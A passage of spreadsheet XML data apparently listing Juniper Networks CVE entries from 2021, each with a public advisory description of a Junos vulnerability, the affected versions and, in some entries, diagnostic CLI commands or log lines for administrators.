packets (pps) et-0/0/1 Up 0 (0) 9999999999 (0) -------------------- Dropped packets will not show up in DDoS monitoring/protection counters as issue is not caused by anti-DDoS protection mechanisms. This issue affects: Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S7 on NFX250, QFX5K Series, EX4600; 17.4 versions prior to 17.4R2-S11, 17.4R3-S3 on NFX250, QFX5K Series, EX4600; 18.1 versions prior to 18.1R3-S9 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4600; 18.2 versions prior to 18.2R3-S3 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600; 18.3 versions prior to 18.3R3-S1 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series; 19.2 versions prior to 19.2R1-S5, 19.2R2 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series; 19.3 versions prior to 19.3R2-S3, 19.3R3 on NFX250, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series; 19.4 versions prior to 19.4R1-S2, 19.4R2 on NFX250, NFX350, QFX5K Series, EX2300 Series, EX3400 Series, EX4300 Multigigabit, EX4600 Series. This issue does not affect Junos OS releases prior to 17.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0208</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in the Routing Protocol Daemon (RPD) service of Juniper Networks Junos OS allows an attacker to send a malformed RSVP packet when bidirectional LSPs are in use, which when received by an egress router crashes the RPD causing a Denial of Service (DoS) condition. Continued receipt of the packet will sustain the Denial of Service. This issue affects: Juniper Networks Junos OS: All versions prior to 17.3R3-S10 except 15.1X49-D240 for SRX series; 17.4 versions prior to 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R3-S3; 19.2 versions prior to 19.2R3; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 15.1X49 versions prior to 15.1X49-D240 on SRX Series. Juniper Networks Junos OS Evolved: 19.3 versions prior to 19.3R2-S5-EVO; 19.4 versions prior to 19.4R2-S2-EVO; 20.1 versions prior to 20.1R1-S4-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0209</t>
  </si>
  <si>
    <t>In Juniper Networks Junos OS Evolved an attacker sending certain valid BGP update packets may cause Junos OS Evolved to access an uninitialized pointer causing RPD to core leading to a Denial of Service (DoS). Continued receipt of these types of valid BGP update packets will cause an extended Denial of Service condition. RPD will require a restart to recover. An indicator of compromise is to see if the file rpd.re exists by issuing the command: show system core-dumps This issue affects: Juniper Networks Junos OS Evolved 19.4 versions prior to 19.4R2-S2-EVO; 20.1 versions prior to 20.1R1-S2-EVO, 20.1R2-S1-EVO. This issue does not affect Junos OS.</t>
  </si>
  <si>
    <t>CVE-2021-0210</t>
  </si>
  <si>
    <t>An Information Exposure vulnerability in J-Web of Juniper Networks Junos OS allows an unauthenticated attacker to elevate their privileges over the target system through opportunistic use of an authenticated users session. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S17; 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3, 19.2R3-S1; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0211</t>
  </si>
  <si>
    <t>An improper check for unusual or exceptional conditions in Juniper Networks Junos OS and Junos OS Evolved Routing Protocol Daemon (RPD) service allows an attacker to send a valid BGP FlowSpec message thereby causing an unexpected change in the route advertisements within the BGP FlowSpec domain leading to disruptions in network traffic causing a Denial of Service (DoS) condition. Continued receipt of these update messages will cause a sustained Denial of Service condition. This issue affects Juniper Networks: Junos OS: All versions prior to 17.3R3-S10 with the exceptions of 15.1X49-D240 on SRX Series and 15.1R7-S8 on EX Series; 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R2-S12, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R1-S3, 19.4R2-S3, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S3 20.2R2; 20.3 versions prior to 20.3R1-S1, 20.3R2. Junos OS Evolved: All versions prior to 20.3R1-S1-EVO, 20.3R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0212</t>
  </si>
  <si>
    <t>An Information Exposure vulnerability in Juniper Networks Contrail Networking allows a locally authenticated attacker able to read files to retrieve administrator credentials stored in plaintext thereby elevating their privileges over the system. This issue affects: Juniper Networks Contrail Networking versions prior to 1911.31.</t>
  </si>
  <si>
    <t>CVE-2021-0214</t>
  </si>
  <si>
    <t>A vulnerability in the distributed or centralized periodic packet management daemon (PPMD) of Juniper Networks Junos OS may cause receipt of a malformed packet to crash and restart the PPMD process, leading to network destabilization, service interruption, and a Denial of Service (DoS) condition. Continued receipt and processing of these malformed packets will repeatedly crash the PPMD process and sustain the Denial of Service (DoS) condition. Due to the nature of the specifically crafted packet, exploitation of this issue requires direct, adjacent connectivity to the vulnerable component. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S12, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S5, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0215</t>
  </si>
  <si>
    <t>On Juniper Networks Junos EX series, QFX Series, MX Series and SRX branch series devices, a memory leak occurs every time the 802.1X authenticator port interface flaps which can lead to other processes, such as the pfex process, responsible for packet forwarding, to crash and restart. An administrator can use the following CLI command to monitor the status of memory consumption: user@device&gt; show task memory detail Please refer to https://kb.juniper.net/KB31522 for details. This issue affects Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D54; 15.1X49 versions prior to 15.1X49-D240 ; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10 ; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2. This issue does not affect Juniper Networks Junos OS 12.3, 15.1.</t>
  </si>
  <si>
    <t>CVE-2021-0216</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS running on the ACX5448 and ACX710 platforms may cause BFD sessions to flap when a high rate of transit ARP packets are received. This, in turn, may impact routing protocols and network stability, leading to a Denial of Service (DoS) condition. When a high rate of transit ARP packets are exceptioned to the CPU and BFD flaps, the following log messages may be seen: bfdd[15864]: BFDD_STATE_UP_TO_DOWN: BFD Session 192.168.14.3 (IFL 232) state Up -&gt; Down LD/RD(17/19) Up time:11:38:17 Local diag: CtlExpire Remote diag: None Reason: Detect Timer Expiry. bfdd[15864]: BFDD_TRAP_SHOP_STATE_DOWN: local discriminator: 17, new state: down, interface: irb.998, peer addr: 192.168.14.3 rpd[15839]: RPD_ISIS_ADJDOWN: IS-IS lost L2 adjacency to peer on irb.998, reason: BFD Session Down bfdd[15864]: BFDD_TRAP_SHOP_STATE_UP: local discriminator: 17, new state: up, interface: irb.998, peer addr: 192.168.14.3 This issue only affects the ACX5448 Series and ACX710 Series routers. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS: 18.2 versions prior to 18.2R3-S8 on ACX5448; 18.3 versions prior to 18.3R3-S5 on ACX5448; 18.4 versions prior to 18.4R1-S6, 18.4R3-S7 on ACX5448; 19.1 versions prior to 19.1R3-S5 on ACX5448; 19.2 versions prior to 19.2R2, 19.2R3 on ACX5448; 19.3 versions prior to 19.3R3 on ACX5448; 19.4 versions prior to 19.4R3 on ACX5448; 20.1 versions prior to 20.1R2 on ACX5448; 20.2 versions prior to 20.2R2 on ACX5448 and ACX710.</t>
  </si>
  <si>
    <t>CVE-2021-0217</t>
  </si>
  <si>
    <t>A vulnerability in processing of certain DHCP packets from adjacent clients on EX Series and QFX Series switches running Juniper Networks Junos OS with DHCP local/relay server configured may lead to exhaustion of DMA memory causing a Denial of Service (DoS). Over time, exploitation of this vulnerability may cause traffic to stop being forwarded, or to crashing of the fxpc process. When Packet DMA heap utilization reaches 99%, the system will become unstable. Packet DMA heap utilization can be monitored through the following command: user@junos# request pfe execute target fpc0 timeout 30 command "show heap" ID Base Total(b) Free(b) Used(b) % Name -- ---------- ----------- ----------- ----------- --- ----------- 0 213301a8 536870488 387228840 149641648 27 Kernel 1 91800000 8388608 3735120 4653488 55 DMA 2 92000000 75497472 74452192 1045280 1 PKT DMA DESC 3 d330000 335544320 257091400 78452920 23 Bcm_sdk 4 96800000 184549376 2408 184546968 99 Packet DMA &lt;--- 5 903fffe0 20971504 20971504 0 0 Blob An indication of the issue occurring may be observed through the following log messages: Dec 10 08:07:00.124 2020 hostname fpc0 brcm_pkt_buf_alloc:523 (buf alloc) failed allocating packet buffer Dec 10 08:07:00.126 2020 hostname fpc0 (buf alloc) failed allocating packet buffer Dec 10 08:07:00.128 2020 hostname fpc0 brcm_pkt_buf_alloc:523 (buf alloc) failed allocating packet buffer Dec 10 08:07:00.130 2020 hostnameC fpc0 (buf alloc) failed allocating packet buffer This issue affects Juniper Networks Junos OS on EX Series and QFX Series: 17.4R3 versions prior to 17.4R3-S3; 18.1R3 versions between 18.1R3-S6 and 18.1R3-S11; 18.2R3 versions prior to 18.2R3-S6; 18.3R3 versions prior to 18.3R3-S4; 18.4R2 versions prior to 18.4R2-S5; 18.4R3 versions prior to 18.4R3-S6; 19.1 versions between 19.1R2 and 19.1R3-S3; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2. Junos OS versions prior to 17.4R3 are unaffected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-0218</t>
  </si>
  <si>
    <t>A command injection vulnerability in the license-check daemon of Juniper Networks Junos OS that may allow a locally authenticated attacker with low privileges to execute commands with root privilege. license-check is a daemon used to manage licenses in Junos OS. To update licenses, a user executes the command 'request system license update' via the CLI. An attacker with access to this CLI command may be able to exploit the vulnerability. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0219</t>
  </si>
  <si>
    <t>A command injection vulnerability in install package validation subsystem of Juniper Networks Junos OS that may allow a locally authenticated attacker with privileges to execute commands with root privilege. To validate a package in Junos before installation, an administrator executes the command 'request system software add validate-on-host' via the CLI. An attacker with access to this CLI command may be able to exploit this vulnerability. This issue affects Juniper Networks Junos OS: all versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R2-S8, 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2; 20.3 versions prior to 20.3R1-S1, 20.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-0220</t>
  </si>
  <si>
    <t>The Junos Space Network Management Platform has been found to store shared secrets in a recoverable format that can be exposed through the UI. An attacker who is able to execute arbitrary code in the victim browser (for example via XSS) or access cached contents may be able to obtain a copy of credentials managed by Junos Space. The impact of a successful attack includes, but is not limited to, obtaining access to other servers connected to the Junos Space Management Platform. This issue affects Juniper Networks Junos Space versions prior to 20.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0221</t>
  </si>
  <si>
    <t>In an EVPN/VXLAN scenario, if an IRB interface with a virtual gateway address (VGA) is configured on a PE, a traffic loop may occur upon receipt of specific IP multicast traffic. The traffic loop will cause interface traffic to increase abnormally, ultimately leading to a Denial of Service (DoS) in packet processing. The following command could be used to monitor the interface traffic: user@junos&gt; monitor interface traffic Interface Link Input packets (pps) Output packets (pps) et-0/0/1 Up 6492089274364 (70994959) 6492089235319 (70994956) et-0/0/25 Up 343458103 (1) 156844 (0) ae0 Up 9132519197257 (70994959) 9132519139454 (70994956) This issue affects Juniper Networks Junos OS on QFX Series: all versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0222</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) to the device by sending certain crafted protocol packets from an adjacent device with invalid payloads to the device. These crafted packets, which should be discarded, are instead replicated and sent to the RE. Over time, a Denial of Service (DoS) occurs. Continued receipt of these crafted protocol packets will cause an extended Denial of Service (DoS) condition, which may cause wider traffic impact due to protocol flapping. An indication of compromise is to check "monitor interface traffic" on the ingress and egress port packet counts. For each ingress packet, two duplicate packets are seen on egress. This issue can be triggered by IPv4 and IPv6 packets. This issue affects all traffic through the device. This issue affects: Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D53 on EX4300, QFX3500, QFX5100, EX4600; 15.1 versions prior to 15.1R7-S6 on EX4300, QFX3500, QFX5100, EX4600; 16.1 versions prior to 16.1R7-S7 on EX4300, QFX5100, EX4600; 17.1 versions prior to 17.1R2-S11 on EX4300, QFX5100, EX4600; 17.1 versions prior to 117.1R3-S2 on EX4300; 17.2 versions prior to 17.2R1-S9 on EX4300; 17.2 versions prior to 17.2R3-S3 on EX4300, QFX5100, EX4600, QFX5110, QFX5200; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7 on EX4300, QFX5100, EX4600, QFX5110, QFX5200; 17.4 versions prior to 17.4R2-S9, 17.4R3 on EX4300, QFX5100, EX4600, QFX5110, QFX5200; 18.1 versions prior to 18.1R3-S9 on EX4300, QFX5100, EX4600, QFX5110, QFX5200, QFX5210, EX2300, EX3400; 18.2 versions prior to 18.2R2-S7 on EX4300; 18.2 versions prior to 18.2R3-S3 on EX4300, QFX5100, EX4600, QFX5110, QFX5200, QFX5210, EX2300, EX3400; 18.3 versions prior to 18.3R2-S3, on EX4300; 18.3 versions prior to 18.3R1-S7, 18.3R3-S1 on EX4300, QFX5100, EX4600, QFX5110, QFX5200, QFX5210, QFX5120, EX4650, EX2300, EX3400; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3 on EX4300, QFX5100, EX4600, QFX5110, QFX5200, QFX5210, QFX5120, EX4650, EX2300, EX3400; 19.1 versions prior to 19.1R1-S4, 19.1R2-S1, 19.1R3 on EX4300, QFX5100, EX4600, QFX5110, QFX5200, QFX5210, QFX5120, EX4650, EX2300, EX3400; 19.2 versions prior to 19.2R1-S4, 19.2R2 on EX4300; 19.2 versions prior to 19.2R1-S3, 19.2R2 on QFX5100, EX4600, QFX5110, QFX5200, QFX5210, QFX5120, EX4650, EX2300, EX3400; 19.3 versions prior to 19.3R2-S1, 19.3R3 on EX4300; 19.3 versions prior to 19.3R1-S1, 19.3R2, 19.3R3 on QFX5100, EX4600, QFX5110, QFX5200, QFX5210, QFX5120, EX4650, EX2300, EX3400;</t>
  </si>
  <si>
    <t>CVE-2021-0223</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability in telnetd.real of Juniper Networks Junos OS may allow a locally authenticated shell user to escalate privileges and execute arbitrary commands as root. telnetd.real is shipped with setuid permissions enabled and is owned by the root user, allowing local users to run telnetd.real with root privileges. This issue affects Juniper Networks Junos OS: all versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0224</t>
  </si>
  <si>
    <t>A vulnerability in the handling of internal resources necessary to bring up a large number of Layer 2 broadband remote access subscriber (BRAS) nodes in Juniper Networks Junos OS can cause the Access Node Control Protocol daemon (ANCPD) to crash and restart, leading to a Denial of Service (DoS) condition. Continued processing of spoofed subscriber nodes will create a sustained Denial of Service (DoS) condition. When the number of subscribers attempting to connect exceeds the configured maximum-discovery-table-entries value, the subscriber fails to map to an internal neighbor entry, causing the ANCPD process to crash. This issue affects Juniper Networks Junos OS: All versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R3-S8; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2; 20.3 versions prior to 20.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-0225</t>
  </si>
  <si>
    <t>An Improper Check for Unusual or Exceptional Conditions in Juniper Networks Junos OS Evolved may cause the stateless firewall filter configuration which uses the action 'policer' in certain combinations with other options to not take effect. An administrator can use the following CLI command to see the failures with filter configuration: user@device&gt; show log kfirewall-agent.log | match ERROR Jul 23 14:16:03 ERROR: filter not supported This issue affects Juniper Networks Junos OS Evolved: Versions 19.1R1-EVO and above prior to 20.3R1-S2-EVO, 20.3R2-EVO. This issue does not affect Juniper Networks Junos OS.</t>
  </si>
  <si>
    <t>CVE-2021-0226</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS Evolved devices, receipt of a specific IPv6 packet may cause an established IPv6 BGP session to terminate, creating a Denial of Service (DoS) condition. Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue does not affect IPv4 BGP sessions. This issue affects IBGP or EBGP peer sessions with IPv6. This issue affects: Juniper Networks Junos OS Evolved: 19.4 versions prior to 19.4R2-S3-EVO; 20.1 versions prior to 20.1R2-S3-EVO; 20.2 versions prior to 20.2R2-S1-EVO; 20.3 versions prior to 20.3R2-EVO. This issue does not affect Juniper Networks Junos OS releases.</t>
  </si>
  <si>
    <t>CVE-2021-0227</t>
  </si>
  <si>
    <t>An improper restriction of operations within the bounds of a memory buffer vulnerability in Juniper Networks Junos OS J-Web on SRX Series devices allows an attacker to cause Denial of Service (DoS) by sending certain crafted HTTP packets. Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. When this issue occurs, web-management, NTP daemon (ntpd) and Layer 2 Control Protocol process (L2CPD) daemons might crash. This issue affects Juniper Networks Junos OS on SRX Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2;</t>
  </si>
  <si>
    <t>CVE-2021-0228</t>
  </si>
  <si>
    <t>An improper check for unusual or exceptional conditions vulnerability in Juniper Networks MX Series platforms with Trio-based MPC (Modular Port Concentrator) deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, may allow an attacker sending specific Layer 2 traffic to cause Distributed Denial of Service (DDoS) protection to trigger unexpectedly, resulting in traffic impact. Continued receipt and processing of this specific Layer 2 frames will sustain the Denial of Service (DoS) condition. An indication of compromise is to check DDOS LACP violations: user@device&gt; show ddos-protection protocols statistics brief | match lacp This issue only affects the MX Series platforms with Trio-based MPC. No other products or platforms are affected. This issue affects: Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S8; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S6; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2;</t>
  </si>
  <si>
    <t>CVE-2021-0229</t>
  </si>
  <si>
    <t>An uncontrolled resource consumption vulnerability in Message Queue Telemetry Transport (MQTT) server of Juniper Networks Junos OS allows an attacker to cause MQTT server to crash and restart leading to a Denial of Service (DoS) by sending a stream of specific packets. A Juniper Extension Toolkit (JET) application designed with a listening port uses the Message Queue Telemetry Transport (MQTT) protocol to connect to a mosquitto broker that is running on Junos OS to subscribe for events. Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS: 16.1R1 and later versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S1, 20.1R3; 20.2 versions prior to 20.2R2-S2, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 16.1R1.</t>
  </si>
  <si>
    <t>CVE-2021-0230</t>
  </si>
  <si>
    <t>On Juniper Networks SRX Series devices with link aggregation (lag) configured, executing any operation that fetches Aggregated Ethernet (AE) interface statistics, including but not limited to SNMP GET requests, causes a slow kernel memory leak. If all the available memory is consumed, the traffic will be impacted and a reboot might be required. The following log can be seen if this issue happens. /kernel: rt_pfe_veto: Memory over consumed. Op 1 err 12, rtsm_id 0:-1, msg type 72 /kernel: rt_pfe_veto: free kmem_map memory = (20770816) curproc = kmd An administrator can use the following CLI command to monitor the status of memory consumption (ifstat bucket): user@device &gt; show system virtual-memory no-forwarding | match ifstat Type InUse MemUse HighUse Limit Requests Limit Limit Size(s) ifstat 2588977 162708K - 19633958 &lt;&lt;&lt;&lt; user@device &gt; show system virtual-memory no-forwarding | match ifstat Type InUse MemUse HighUse Limit Requests Limit Limit Size(s) ifstat 3021629 189749K - 22914415 &lt;&lt;&lt;&lt; This issue affects Juniper Networks Junos OS on SRX Series: 17.1 versions 17.1R3 and above prior to 17.3R3-S11; 17.4 versions prior to 17.4R3-S5; 18.2 versions prior to 18.2R3-S7, 18.2R3-S8; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S6; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2-S2, 20.2R3; 20.3 versions prior to 20.3R1-S2, 20.3R2. This issue does not affect Juniper Networks Junos OS prior to 17.1R3.</t>
  </si>
  <si>
    <t>CVE-2021-0231</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the Juniper Networks SRX and vSRX Series may allow an authenticated J-web user to read sensitive system files. This issue affects Juniper Networks Junos OS on SRX and vSRX Series: 19.3 versions prior to 19.3R2-S6, 19.3R3-S1; 19.4 versions prior to 19.4R2-S4, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S3, 20.2R2; This issue does not affect Juniper Networks Junos OS versions prior to 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0232</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability in the Juniper Networks Paragon Active Assurance Control Center may allow an attacker with specific information about the deployment to mimic an already registered Test Agent and access its configuration including associated inventory details. If the issue occurs, the affected Test Agent will not be able to connect to the Control Center. This issue affects Juniper Networks Paragon Active Assurance Control Center All versions prior to 2.35.6; 2.36 versions prior to 2.36.2.</t>
  </si>
  <si>
    <t>CVE-2021-0233</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS ACX500 Series, ACX4000 Series, may allow an attacker to cause a Denial of Service (DoS) by sending a high rate of specific packets to the device, resulting in a Forwarding Engine Board (FFEB) crash. Continued receipt of these packets will sustain the Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS on ACX500 Series, ACX4000 Series: 17.4 versions prior to 17.4R3-S2.</t>
  </si>
  <si>
    <t>CVE-2021-0234</t>
  </si>
  <si>
    <t>Due to an improper Initialization vulnerability on Juniper Networks Junos OS QFX5100-96S devices with QFX 5e Series image installed, ddos-protection configuration changes will not take effect beyond the default DDoS (Distributed Denial of Service) settings when configured from the CLI. The DDoS protection (jddosd) daemon allows the device to continue to function while protecting the packet forwarding engine (PFE) during the DDoS attack. When this issue occurs, the default DDoS settings within the PFE apply, as CPU bound packets will be throttled and dropped in the PFE when the limits are exceeded. To check if the device has this issue, the administrator can execute the following command to monitor the status of DDoS protection: user@device&gt; show ddos-protection protocols error: the ddos-protection subsystem is not running This issue affects only QFX5100-96S devices. No other products or platforms are affected by this issue. This issue affects: Juniper Networks Junos OS on QFX5100-96S: 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R3, 19.1R3-S4; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2;</t>
  </si>
  <si>
